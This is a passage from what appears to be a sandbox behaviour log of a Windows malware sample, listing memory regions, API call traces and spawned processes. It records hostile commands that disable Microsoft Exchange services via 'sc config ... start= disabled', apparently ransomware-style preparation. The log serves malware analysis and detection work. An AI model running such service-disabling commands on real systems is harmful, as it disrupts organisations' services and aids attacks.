"child_process" parent_id = "170" os_parent_pid = "0xd44" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8900 start_va = 0x7fb36000 end_va = 0x7fb36fff entry_point = 0x0 region_type = private name = "private_0x000000007fb36000" filename = "" Region: id = 8901 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8902 start_va = 0x392b40000 end_va = 0x392b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000392b40000" filename = "" Region: id = 8903 start_va = 0x392b60000 end_va = 0x392b73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000392b60000" filename = "" Region: id = 8904 start_va = 0x392b80000 end_va = 0x392bbffff entry_point = 0x0 region_type = private name = "private_0x0000000392b80000" filename = "" Region: id = 8905 start_va = 0x7df5ff6d0000 end_va = 0x7ff5ff6cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6d0000" filename = "" Region: id = 8906 start_va = 0x7ff6c3ad0000 end_va = 0x7ff6c3af2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ad0000" filename = "" Region: id = 8907 start_va = 0x7ff6c3afb000 end_va = 0x7ff6c3afbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3afb000" filename = "" Region: id = 8908 start_va = 0x7ff6c3afe000 end_va = 0x7ff6c3afffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3afe000" filename = "" Region: id = 8909 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8910 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8911 start_va = 0x392b40000 end_va = 0x392b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000392b40000" filename = "" Region: id = 8912 start_va = 0x392b50000 end_va = 0x392b56fff entry_point = 0x0 region_type = private name = "private_0x0000000392b50000" filename = "" Region: id = 8913 start_va = 0x392bc0000 end_va = 0x392c7dfff entry_point = 0x392bc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8914 start_va = 0x392c80000 end_va = 0x392cbffff entry_point = 0x0 region_type = private name = "private_0x0000000392c80000" filename = "" Region: id = 8915 start_va = 0x392cc0000 end_va = 0x392cc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000392cc0000" filename = "" Region: id = 8916 start_va = 0x392cd0000 end_va = 0x392cd6fff entry_point = 0x0 region_type = private name = "private_0x0000000392cd0000" filename = "" Region: id = 8917 start_va = 0x392ce0000 end_va = 0x392ce0fff entry_point = 0x0 region_type = private name = "private_0x0000000392ce0000" filename = "" Region: id = 8918 start_va = 0x392cf0000 end_va = 0x392cf0fff entry_point = 0x0 region_type = private name = "private_0x0000000392cf0000" filename = "" Region: id = 8919 start_va = 0x392d20000 end_va = 0x392e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000392d20000" filename = "" Region: id = 8920 start_va = 0x392f60000 end_va = 0x392f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000392f60000" filename = "" Region: id = 8921 start_va = 0x392f70000 end_va = 0x3930f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000392f70000" filename = "" Region: id = 8922 start_va = 0x393100000 end_va = 0x393280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000393100000" filename = "" Region: id = 8923 start_va = 0x393290000 end_va = 0x39468ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000393290000" filename = "" Region: id = 8924 start_va = 0x7ff6c39d0000 end_va = 0x7ff6c3acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c39d0000" filename = "" Region: id = 8925 start_va = 0x7ff6c3afc000 end_va = 0x7ff6c3afdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3afc000" filename = "" Region: id = 8926 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8927 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8928 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8929 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8930 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8931 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8932 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8933 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8934 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8935 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8936 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8937 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8938 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8939 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 552 os_tid = 0xd3c Thread: id = 553 os_tid = 0xd38 Thread: id = 554 os_tid = 0x834 Process: id = "172" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0xfd8b000" os_pid = "0xd80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "170" os_parent_pid = "0xd44" cmd_line = "sc config MSExchangeSA start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8953 start_va = 0x3f0000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 8954 start_va = 0x410000 end_va = 0x411fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 8955 start_va = 0x420000 end_va = 0x433fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 8956 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 8957 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8958 start_va = 0x4c0000 end_va = 0x4c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 8959 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 8960 start_va = 0x4e0000 end_va = 0x4e1fff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 8961 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 8962 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 8963 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8964 start_va = 0x7e6f0000 end_va = 0x7e712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6f0000" filename = "" Region: id = 8965 start_va = 0x7e715000 end_va = 0x7e715fff entry_point = 0x0 region_type = private name = "private_0x000000007e715000" filename = "" Region: id = 8966 start_va = 0x7e717000 end_va = 0x7e717fff entry_point = 0x0 region_type = private name = "private_0x000000007e717000" filename = "" Region: id = 8967 start_va = 0x7e71d000 end_va = 0x7e71ffff entry_point = 0x0 region_type = private name = "private_0x000000007e71d000" filename = "" Region: id = 8968 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8969 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8970 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8971 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8972 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8973 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8974 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8975 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8976 start_va = 0x780000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 8977 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8978 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 8979 start_va = 0x400000 end_va = 0x403fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8980 start_va = 0x4f0000 end_va = 0x5adfff entry_point = 0x4f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8981 start_va = 0x5b0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 8982 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 8983 start_va = 0xa20000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 8984 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8985 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8986 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8987 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8988 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8989 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8990 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8991 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8992 start_va = 0x7e5f0000 end_va = 0x7e6effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e5f0000" filename = "" Region: id = 8993 start_va = 0x7e71a000 end_va = 0x7e71cfff entry_point = 0x0 region_type = private name = "private_0x000000007e71a000" filename = "" Region: id = 8994 start_va = 0x660000 end_va = 0x73efff entry_point = 0x660000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 8995 start_va = 0x5f0000 end_va = 0x601fff entry_point = 0x5f0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 556 os_tid = 0xd70 [0133.772] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0133.772] __set_app_type (_Type=0x1) [0133.772] __p__fmode () returned 0x77ac4d6c [0133.772] __p__commode () returned 0x77ac5b1c [0133.772] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0133.772] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0133.772] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.774] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0133.774] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0133.774] _wcsicmp (_String1="config", _String2="query") returned -14 [0133.774] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0133.774] _wcsicmp (_String1="config", _String2="start") returned -16 [0133.774] _wcsicmp (_String1="config", _String2="pause") returned -13 [0133.774] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0133.774] _wcsicmp (_String1="config", _String2="control") returned -14 [0133.774] _wcsicmp (_String1="config", _String2="continue") returned -14 [0133.774] _wcsicmp (_String1="config", _String2="stop") returned -16 [0133.774] _wcsicmp (_String1="config", _String2="config") returned 0 [0133.774] ResolveDelayLoadedAPI () returned 0x77262c10 [0133.774] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x788530 [0133.776] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0133.776] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0133.777] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0133.777] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0133.777] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0133.777] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0133.777] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0133.777] OpenServiceW (hSCManager=0x788530, lpServiceName="MSExchangeSA", dwDesiredAccess=0x3) returned 0x0 [0133.777] GetLastError () returned 0x424 [0133.777] _ultow (in: _Dest=0x424, _Radix=4978928 | out: _Dest=0x424) returned="1060" [0133.777] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0133.778] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x4bf8cc, nSize=0x2, Arguments=0x4bf8e4 | out: lpBuffer="裀x奈K蔔è") returned 0x62 [0133.778] GetFileType (hFile=0x3c) returned 0x2 [0133.778] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x4bf8b0 | out: lpMode=0x4bf8b0) returned 1 [0133.779] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7888c0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x4bf8c0, lpReserved=0x0 | out: lpBuffer=0x7888c0*, lpNumberOfCharsWritten=0x4bf8c0*=0x62) returned 1 [0133.779] LocalFree (hMem=0x7888c0) returned 0x0 [0133.779] LocalFree (hMem=0x0) returned 0x0 [0133.779] CloseServiceHandle (hSCObject=0x788530) returned 1 [0133.779] LocalFree (hMem=0x0) returned 0x0 [0133.779] exit (_Code=1060) Thread: id = 557 os_tid = 0x454 Process: id = "173" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3db52000" os_pid = "0xd84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeThrottling start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8996 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8997 start_va = 0xf30000 end_va = 0x4f2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 8998 start_va = 0x4f30000 end_va = 0x4f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f30000" filename = "" Region: id = 8999 start_va = 0x4f50000 end_va = 0x4f51fff entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 9000 start_va = 0x4f60000 end_va = 0x4f73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f60000" filename = "" Region: id = 9001 start_va = 0x4f80000 end_va = 0x4fbffff entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 9002 start_va = 0x4fc0000 end_va = 0x50bffff entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 9003 start_va = 0x50c0000 end_va = 0x50c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050c0000" filename = "" Region: id = 9004 start_va = 0x50d0000 end_va = 0x50d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050d0000" filename = "" Region: id = 9005 start_va = 0x50e0000 end_va = 0x50e1fff entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 9006 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9007 start_va = 0x7ec10000 end_va = 0x7ec32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec10000" filename = "" Region: id = 9008 start_va = 0x7ec33000 end_va = 0x7ec33fff entry_point = 0x0 region_type = private name = "private_0x000000007ec33000" filename = "" Region: id = 9009 start_va = 0x7ec3b000 end_va = 0x7ec3bfff entry_point = 0x0 region_type = private name = "private_0x000000007ec3b000" filename = "" Region: id = 9010 start_va = 0x7ec3d000 end_va = 0x7ec3ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec3d000" filename = "" Region: id = 9011 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9012 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9013 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9014 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9015 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9016 start_va = 0x52d0000 end_va = 0x52dffff entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 9017 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9018 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9019 start_va = 0x5140000 end_va = 0x523ffff entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 9020 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9061 start_va = 0x4f30000 end_va = 0x4f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f30000" filename = "" Region: id = 9062 start_va = 0x50f0000 end_va = 0x512ffff entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 9063 start_va = 0x52e0000 end_va = 0x539dfff entry_point = 0x52e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9064 start_va = 0x53a0000 end_va = 0x549ffff entry_point = 0x0 region_type = private name = "private_0x00000000053a0000" filename = "" Region: id = 9065 start_va = 0x5670000 end_va = 0x567ffff entry_point = 0x0 region_type = private name = "private_0x0000000005670000" filename = "" Region: id = 9066 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9067 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9068 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9069 start_va = 0x7eb10000 end_va = 0x7ec0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb10000" filename = "" Region: id = 9070 start_va = 0x7ec38000 end_va = 0x7ec3afff entry_point = 0x0 region_type = private name = "private_0x000000007ec38000" filename = "" Region: id = 9071 start_va = 0x4f40000 end_va = 0x4f43fff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 9072 start_va = 0x4f50000 end_va = 0x4f53fff entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 9073 start_va = 0x5680000 end_va = 0x59b6fff entry_point = 0x5680000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 558 os_tid = 0xd90 [0133.936] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0133.936] __set_app_type (_Type=0x1) [0133.936] __p__fmode () returned 0x77ac4d6c [0133.936] __p__commode () returned 0x77ac5b1c [0133.936] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0133.936] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0133.936] GetCurrentThreadId () returned 0xd90 [0133.936] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd90) returned 0x84 [0133.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0133.937] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0133.937] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.939] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.939] RegOpenKeyExW (in: hKey=0x80000001, 